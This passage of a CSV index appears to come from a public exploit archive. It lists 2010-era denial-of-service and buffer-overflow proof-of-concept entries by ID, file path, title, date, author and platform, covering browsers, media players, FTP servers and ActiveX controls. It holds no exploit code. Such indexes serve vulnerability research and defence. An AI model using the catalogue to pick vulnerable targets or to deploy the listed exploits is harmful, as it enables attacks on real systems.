Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service",2010-01-18,"Mert SARICA",dos,windows, +11190,exploits/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow",2010-01-19,"Hellcode Research",dos,windows, +11192,exploits/windows/dos/11192.txt,"OpenOffice - '.slk' Parsing Null Pointer",2010-01-19,"Hellcode Research",dos,windows, +11195,exploits/windows/dos/11195.html,"Microsoft Windows Defender - ActiveX Heap Overflow (PoC)",2010-01-19,SarBoT511,dos,windows, +11196,exploits/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow (PoC)",2010-01-19,"SarBoT511 & D3V!L FUCKER",dos,windows, +11197,exploits/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - '.smi' Local Buffer Overflow (PoC)",2010-01-19,d3b4g,dos,windows, +11209,exploits/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic - '.asx' Local Crash",2010-01-21,cr4wl3r,dos,windows, +11214,exploits/windows/dos/11214.html,"Microsoft Windows Live Messenger 2009 - ActiveX Heap Overflow (PoC)",2010-01-21,SarBoT511,dos,windows, +11217,exploits/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 - Defer Remote Buffer Overflow (PoC)",2010-01-21,SkuLL-HackeR,dos,windows, +11227,exploits/windows/dos/11227.pl,"yPlay 1.0.76 - '.mp3' Local Crash (PoC)",2010-01-22,cr4wl3r,dos,windows, +11228,exploits/windows/dos/11228.pl,"Pico MP3 Player 1.0 - '.mp3' / '.pls' Local Crash (PoC)",2010-01-22,cr4wl3r,dos,windows, +11233,exploits/windows/dos/11233.pl,"QtWeb 3.0 - Remote Crash (Denial of Service)",2010-01-22,"Zer0 Thunder",dos,windows, +11234,exploits/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,dos,windows, +11245,exploits/windows/dos/11245.txt,"Mozilla Firefox 3.6 - XML Parser Memory Corruption (PoC) / Denial of Service",2010-01-24,d3b4g,dos,windows, +11247,exploits/windows/dos/11247.txt,"Opera 10.10 - XML Parser Denial of Service (PoC)",2010-01-24,d3b4g,dos,windows, +11248,exploits/windows/dos/11248.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)",2010-01-24,Debug,dos,windows, +11254,exploits/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",dos,windows, +11260,exploits/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,dos,windows, +11265,exploits/windows/dos/11265.pl,"KOL WaveIOX 1.04 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,cr4wl3r,dos,windows, +11266,exploits/windows/dos/11266.pl,"KOL Wave Player 1.0 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,cr4wl3r,dos,windows, +11273,exploits/ios/dos/11273.py,"iOS Serversman 3.1.5 - HTTP Remote Denial of Service",2010-01-27,mr_me,dos,ios, +11276,exploits/windows/dos/11276.txt,"Microsoft Internet Explorer 6.0/7.0 - Null Pointer crashes",2010-01-20,Skylined,dos,windows, +11288,exploits/multiple/dos/11288.py,"Wireshark 1.2.5 - LWRES getaddrbyname Stack Buffer Overflow",2010-01-29,babi,dos,multiple, +11291,exploits/hardware/dos/11291.txt,"Xerox Workcenter 4150 - Remote Buffer Overflow",2010-01-30,"Francis Provencher",dos,hardware, +11320,exploits/windows/dos/11320.pl,"Digital Amp MP3 3.1 - '.mp3' Local Crash (PoC)",2010-02-02,SkuLL-HackeR,dos,windows, +11332,exploits/windows/dos/11332.pl,"Opera 10.10 - Remote Code Execution Denial of Service",2010-02-05,cr4wl3r,dos,windows, +11338,exploits/windows/dos/11338.py,"X-lite SIP 3.0 - 'wav' memory Corruption Heap Buffer Overflow",2010-02-06,TecR0c,dos,windows, +11342,exploits/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local Denial of Service",2010-02-06,"Nishant Das Patnaik",dos,windows, +11343,exploits/windows/dos/11343.py,"httpdx 1.5.2 - Unauthenticated Remote Denial of Service (PoC)",2010-02-07,loneferret,dos,windows, +11347,exploits/windows/dos/11347.html,"Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",dos,windows, +11351,exploits/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL - Denial of Service",2010-02-07,"Patroklos Argyroudis",dos,solaris, +11363,exploits/windows/dos/11363.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow (PoC)",2010-02-09,"fl0 fl0w",dos,windows, +11374,exploits/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JIKO,dos,windows, +11391,exploits/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC)",2010-02-10,loneferret,dos,windows, +11392,exploits/windows/dos/11392.c,"RadASM 2.2.1.6 - '.rap' Local Buffer Overflow (PoC)",2010-02-11,"fl0 fl0w",dos,windows, +11397,exploits/php/dos/11397.txt,"PHP Captcha Security Images - Denial of Service",2010-02-11,cp77fk4r,dos,php, +11407,exploits/windows/dos/11407.txt,"Core Impact 7.5 - Denial of Service",2010-02-11,"Beenu Arora",dos,windows,80 +11426,exploits/multiple/dos/11426.txt,"Multiple Browsers - Address bar Characters",2010-02-12,"Pouya Daneshmand",dos,multiple, +11427,exploits/hardware/dos/11427.txt,"Nokia Symbian OS 3rd Edition - Multiple Web Browser Vulnerabilities",2010-02-12,"Nishant Das Patnaik",dos,hardware, +11432,exploits/windows/dos/11432.txt,"Mozilla Firefox 3.6 - Denial of Service (1)",2010-02-13,"Asheesh kumar Mani Tripathi",dos,windows, +11438,exploits/windows/dos/11438.txt,"Microsoft Internet Explorer 8 - Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",dos,windows, +11451,exploits/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' File Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,dos,windows, +11467,exploits/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",dos,ios, +11469,exploits/windows/dos/11469.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,dos,windows, +11470,exploits/windows/dos/11470.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,dos,windows, +11472,exploits/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,dos,ios, +11492,exploits/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,dos,windows, +11499,exploits/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,dos,ios, +11520,exploits/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,dos,ios, +11529,exploits/multiple/dos/11529.txt,"Adobe (Multiple Products) - XML External Entity / XML Injection",2010-02-22,"Roberto Suggi Liverani",dos,multiple, +11531,exploits/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,dos,windows, +11532,exploits/windows/dos/11532.html,"Winamp 5.57 - 'Browser' IE Denial of Service",2010-02-22,cr4wl3r,dos,windows, +11533,exploits/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - ISO Compilation Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,dos,windows, +11534,exploits/windows/dos/11534.pl,"VKPlayer 1.0 - '.mid' Denial of Service",2010-02-22,cr4wl3r,dos,windows, +11535,exploits/windows/dos/11535.pl,"Media Player Classic 6.4.9.1 - '.avi' Buffer Overflow",2010-02-22,cr4wl3r,dos,windows, +11536,exploits/windows/dos/11536.pl,"GOM Player 2.1.21.4846 - '.wav' Buffer Overflow",2010-02-22,cr4wl3r,dos,windows, +11537,exploits/windows/dos/11537.pl,"Chasys Media Player 1.1 - '.mid' Local Buffer Overflow",2010-02-22,cr4wl3r,dos,windows, +11540,exploits/windows/dos/11540.pl,"Total Video Player 1.31 - '.wav' Local Crash",2010-02-22,v3n0m,dos,windows, +11541,exploits/windows/dos/11541.pl,"Total Video Player 1.31 - '.avi' Local Crash (PoC)",2010-02-22,diving,dos,windows, +11546,exploits/hardware/dos/11546.py,"iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service (PoC)",2010-02-23,b0telh0,dos,hardware, +11552,exploits/hardware/dos/11552.pl,"iPhone FtpDisc 1.0 - Denial of Service",2010-02-23,Ale46,dos,hardware, +11556,exploits/hardware/dos/11556.pl,"iPhone FTP Server By Zhang Boyang - Remote Denial of Service",2010-02-23,Ale46,dos,hardware, +11567,exploits/multiple/dos/11567.txt,"Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)",2010-02-24,"Rad L. Sneak",dos,multiple, +11574,exploits/hardware/dos/11574.py,"iPhone - 'WebCore::CSSSelector()' Remote Crash",2010-02-24,t12,dos,hardware, +11590,exploits/multiple/dos/11590.php,"Mozilla Firefox 3.6 - Denial of Service (2)",2010-02-27,Ale46,dos,multiple, +11597,exploits/hardware/dos/11597.py,"RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)",2010-02-28,ad0nis,dos,hardware, +11601,exploits/windows/dos/11601.pl,"Apple Safari 4.0.4 (531.21.10) - Stack Overflow / Denial of Service",2010-02-28,"John Cobb",dos,windows, +11608,exploits/hardware/dos/11608.rb,"iPhone / iTouch FtpDisc 1.0 - Buffer Overflow / Denial of Service",2010-03-01,"Alberto Ortega",dos,hardware, +11617,exploits/windows/dos/11617.txt,"Opera / Mozilla Firefox 3.6 - Long String Crash",2010-03-02,"Asheesh kumar Mani Tripathi",dos,windows, +11622,exploits/windows/dos/11622.php,"Opera 10.50 - integer Overflow",2010-03-03,"Marcin Ressel",dos,windows, +11628,exploits/windows/dos/11628.pl,"AKoff MIDI Player 1.00 - Buffer Overflow",2010-03-04,cr4wl3r,dos,windows, +11630,exploits/windows/dos/11630.pl,"WinSmMuPl 1.2.5 - '.mp3' Local Crash (PoC)",2010-03-04,cr4wl3r,dos,windows, +11632,exploits/windows/dos/11632.txt,"Orb 2.0.01.0049 < 2.54.0018 - DirectShow Denial of Service",2010-03-04,"Matthew Bergin",dos,windows, +11633,exploits/hardware/dos/11633.pl,"Sagem Routers - Remote Reset",2010-03-04,AlpHaNiX,dos,hardware, +11639,exploits/windows/dos/11639.txt,"Google Chrome 4.0.249 - XML Denial of Service (PoC)",2010-03-06,Blade,dos,windows, +11644,exploits/multiple/dos/11644.py,"Flare 0.6 - Local Heap Overflow Denial of Service",2010-03-06,l3D,dos,multiple, +11652,exploits/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash",2010-03-07,l3D,dos,windows, +11669,exploits/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - 'argument' Local Crash",2010-03-09,l3D,dos,windows, +11670,exploits/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,dos,windows, +11705,exploits/multiple/dos/11705.c,"FreeBSD / OpenBSD - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-12,kingcope,dos,multiple, +11706,exploits/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,dos,windows, +11714,exploits/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,dos,windows, +11717,exploits/multiple/dos/11717.php,"PHP (Multiple Functions) - Local Denial of Service",2010-03-13,"Yakir Wizman",dos,multiple, +11724,exploits/windows/dos/11724.pl,"GOM Player 2.1.21 - '.avi' Denial of Service",2010-03-14,En|gma7,dos,windows, +11728,exploits/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' File Crash (Denial of Service)",2010-03-14,En|gma7,dos,windows, +14367,exploits/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",dos,multiple, +11734,exploits/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Unauthenticated Remote Denial of Service Vulnerabilities (PoC)",2010-03-14,loneferret,dos,windows, +11736,exploits/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",dos,linux,389 +11763,exploits/multiple/dos/11763.pl,"Embedthis Appweb 3.1.2 - Remote Denial of Service",2010-03-15,chr1x,dos,multiple, +11769,exploits/hardware/dos/11769.py,"iPhone Springboard - Malformed Character Crash (PoC)",2010-03-15,"Chase Higgins",dos,hardware, +11770,exploits/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST Denial of Service",2010-03-16,dmnt,dos,linux,21 +11792,exploits/multiple/dos/11792.pl,"mplayer 4.4.1 - Null Pointer Dereference (PoC)",2010-03-18,"Pietro Oliva",dos,multiple, +11803,exploits/windows/dos/11803.txt,"Crimson Editor - Overwrite (SEH)",2010-03-18,sharpe,dos,windows, +11809,exploits/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,dos,windows,21 +11810,exploits/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Crashs (SEH) (PoC)",2010-03-19,loneferret,dos,windows,21 +11827,exploits/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,dos,windows, +11838,exploits/windows/dos/11838.php,"Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)",2010-03-22,3lkt3F0k4,dos,windows, +11839,exploits/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,dos,windows, +11842,exploits/windows/dos/11842.py,"freeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,dos,windows, +11855,exploits/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",dos,multiple, +11861,exploits/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,dos,windows, +11878,exploits/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,dos,windows,69 +11880,exploits/hardware/dos/11880.txt,"Lexmark Multiple Laser printers - Remote Stack Overflow",2010-03-25,"Francis Provencher",dos,hardware, +11890,exploits/ios/dos/11890.txt,"Apple iOS Safari - Bad 'VML' Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",dos,ios, +11891,exploits/ios/dos/11891.txt,"Apple iOS Safari - Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",dos,ios, +11893,exploits/linux/dos/11893.pl,"tPop3d 1.5.3 - Denial of Service",2010-03-26,OrderZero,dos,linux, +11930,exploits/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow (PoC)",2010-03-29,mat,dos,windows, +11932,exploits/linux/dos/11932.txt,"xwine 1.0.1 - '.exe' Local Crash (PoC)",2010-03-29,JosS,dos,linux, +11955,exploits/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow (PoC)",2010-03-30,ITSecTeam,dos,windows, +11959,exploits/windows/dos/11959.pl,"Xilisoft BlackBerry Ring Tone Maker - '.wma' Local Crash",2010-03-30,anonymous,dos,windows, +11966,exploits/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,dos,windows, +11975,exploits/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' (PoC)",2010-03-30,"Richard leahy",dos,windows, +11977,exploits/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,dos,windows, +11984,exploits/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File (SEH) (PoC)",2010-03-31,TecR0c,dos,windows, +11985,exploits/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",dos,windows, +12000,exploits/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,dos,windows, +12001,exploits/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,dos,windows, +12010,exploits/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",dos,windows, +12011,exploits/windows/dos/12011.txt,"Google Chrome 4.1 - Out-of-Bounds Array Indexing",2010-04-02,"Tobias Klein",dos,windows, +12025,exploits/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial of Service",2010-04-03,"Yakir Wizman",dos,windows, +12027,exploits/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash",2010-04-03,l3D,dos,windows, +12030,exploits/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) Buffer Overflow (PoC)",2010-04-03,d3b4g,dos,windows, +12032,exploits/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control - ActiveX Remote Code Execution",2010-04-03,ZSploit.com,dos,windows, +12072,exploits/windows/dos/12072.pl,"MyVideoConverter 2.15 - Local Denial of Service",2010-04-05,anonymous,dos,windows, +12073,exploits/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service",2010-04-05,anonymous,dos,windows, +12074,exploits/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)",2010-04-05,R3d-D3V!L,dos,windows, +12079,exploits/windows/dos/12079.pl,"Microsoft Office 2010 Beta - Communicator SIP Denial of Service",2010-04-06,indoushka,dos,windows, +12080,exploits/windows/dos/12080.txt,"Foxit Reader 3.2.1.0401 - Denial of Service",2010-04-06,juza,dos,windows, +12081,exploits/windows/dos/12081.php,"Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)",2010-04-06,mr_me,dos,windows, +12093,exploits/hardware/dos/12093.txt,"McAfee Email Gateway (formerly IronMail) - Denial of Service",2010-04-06,"Nahuel Grisolia",dos,hardware, +12095,exploits/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",dos,linux, +12096,exploits/windows/dos/12096.txt,"Juke 4.0.2 - Denial of Service Multiple Files",2010-04-06,anonymous,dos,windows, +12104,exploits/windows/dos/12104.py,"Anyzip 1.1 - '.zip' (PoC) (SEH)",2010-04-07,ITSecTeam,dos,windows, +12109,exploits/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,dos,multiple, +12110,exploits/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",dos,windows, +12131,exploits/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,dos,windows, +12154,exploits/php/dos/12154.txt,"vBulletin (Cyb - Advanced Forum Statistics) - 'misc.php' Denial of Service",2010-04-10,"Andhra Hackers",dos,php, +12161,exploits/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Memory Corruption (PoC)",2010-04-11,LiquidWorm,dos,windows, +12165,exploits/multiple/dos/12165.txt,"PHP 5.3.0 - 'getopt()' Denial of Service",2010-04-12,Napst3r,dos,multiple, +12188,exploits/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",dos,multiple, +12201,exploits/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer (PoC)",2010-04-13,s4squatch,dos,windows, +12204,exploits/windows/dos/12204.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpSendRequest Crash (PoC)",2010-04-13,s4squatch,dos,windows, +12205,exploits/windows/dos/12205.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetSessionDel (PoC)",2010-04-13,s4squatch,dos,windows, +12206,exploits/windows/dos/12206.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetFileClose Overwrite (SEH) (PoC)",2010-04-13,s4squatch,dos,windows, +12207,exploits/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,dos,windows, +12208,exploits/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,dos,windows, +12217,exploits/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Heap-Based Buffer Overflow",2010-04-14,"Lukas Lueg",dos,multiple, +12228,exploits/windows/dos/12228.py,"MovieLibrary 1.4.401 - '.dmv' Local Denial of Service",2010-04-14,anonymous,dos,windows, +12229,exploits/windows/dos/12229.py,"Book Library 1.4.162 - '.bkd' Local Denial of Service",2010-04-14,anonymous,dos,windows, +12240,exploits/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,dos,windows, +15732,exploits/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",dos,linux, +12243,exploits/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml Configuration parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,dos,windows, +12252,exploits/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",dos,hardware, +12258,exploits/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)",2010-04-16,"laurent gaffie",dos,windows, +12259,exploits/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,dos,php, +12273,exploits/windows/dos/12273.py,"Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)",2010-04-17,"laurent gaffie",dos,windows, +12274,exploits/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,dos,windows, +12294,exploits/windows/dos/12294.txt,"Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities",2010-04-19,LiquidWorm,dos,windows, +12297,exploits/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Modem Reset (Denial of Service)",2010-04-19,hkm,dos,hardware, +12302,exploits/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,dos,windows, +12314,exploits/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,dos,windows, +12324,exploits/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",dos,multiple, +12334,exploits/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,dos,linux, +12336,exploits/windows/dos/12336.c,"Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,dos,windows, +12337,exploits/windows/dos/12337.c,"Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,dos,windows, +12341,exploits/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - 'EDImage.ocx' Remote Denial of Service (IE)",2010-04-22,LiquidWorm,dos,windows, +12344,exploits/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - '7D11' Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",dos,hardware, +12356,exploits/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Blue Screen of Death (Denial of Service)",2010-04-23,p4r4N0ID,dos,windows, +12375,exploits/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",dos,osx, +12382,exploits/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,dos,multiple, +12401,exploits/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",dos,multiple, +12408,exploits/windows/dos/12408.pl,"Apple Safari 4.0.5 (531.22.7) - Denial of Service",2010-04-26,"Xss mAn",dos,windows, +12422,exploits/windows/dos/12422.pl,"Acoustica 3.32 CD/DVD Label Maker - '.m3u' (PoC)",2010-04-27,chap0,dos,windows, +12425,exploits/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,dos,windows, +12431,exploits/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,dos,windows, +12437,exploits/windows/dos/12437.html,"Apple Safari 4.0.3/4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",dos,windows, +12457,exploits/win_x86/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (2)",2010-04-29,ITSecTeam,dos,win_x86, +12477,exploits/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,dos,windows, +12482,exploits/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",dos,windows, +12487,exploits/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",dos,windows, +12491,exploits/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,Inj3ct0r,dos,multiple, +12492,exploits/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)",2010-05-03,Dr_IDE,dos,windows, +12493,exploits/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,dos,multiple, +12494,exploits/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,dos,windows, +12508,exploits/osx/dos/12508.html,"Multiple Browsers - 'history.go()' Denial of Service",2010-05-04,Dr_IDE,dos,osx, +12509,exploits/osx/dos/12509.html,"Multiple Browsers - 'window.print()' Denial of Service",2010-05-04,Dr_IDE,dos,osx, +12518,exploits/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,dos,windows, +12524,exploits/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service",2010-05-07,"Jelmer de Hen",dos,windows, +12527,exploits/asp/dos/12527.txt,"Administrador de Contenidos - Admin Authentication Bypass",2010-05-07,Ra3cH,dos,asp, +12529,exploits/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",dos,windows, +12530,exploits/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",dos,windows, +12531,exploits/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,dos,windows, +12541,exploits/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial of Service",2010-05-09,"Yakir Wizman",dos,windows, +12546,exploits/windows/dos/12546.pl,"Hyplay 1.2.326.1 - '.asx' Local Denial of Service Crash (PoC)",2010-05-10,"Steve James",dos,windows, +12554,exploits/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server - Denial of Service",2010-05-10,XroGuE,dos,php, +12555,exploits/multiple/dos/12555.txt,"Pargoon CMS - Denial of Service",2010-05-10,"Pouya Daneshmand",dos,multiple, +12564,exploits/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail - Integer Overflow",2010-05-11,"Francis Provencher",dos,windows, +12578,exploits/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - 'DIR' Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,dos,windows, +12588,exploits/linux/dos/12588.txt,"Samba 3.4.7/3.5.1 - Denial of Service",2010-05-13,"laurent gaffie",dos,linux, +12602,exploits/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",dos,windows, +12603,exploits/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",dos,windows, +12604,exploits/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",dos,windows, +12605,exploits/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,dos,windows, +12650,exploits/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",dos,windows, +12652,exploits/netbsd_x86/dos/12652.sh,"NetBSD 5.0 - Hack GENOCIDE Environment Overflow (PoC)",2010-05-18,JMIT,dos,netbsd_x86, +12653,exploits/netbsd_x86/dos/12653.sh,"NetBSD 5.0 - Hack PATH Environment Overflow 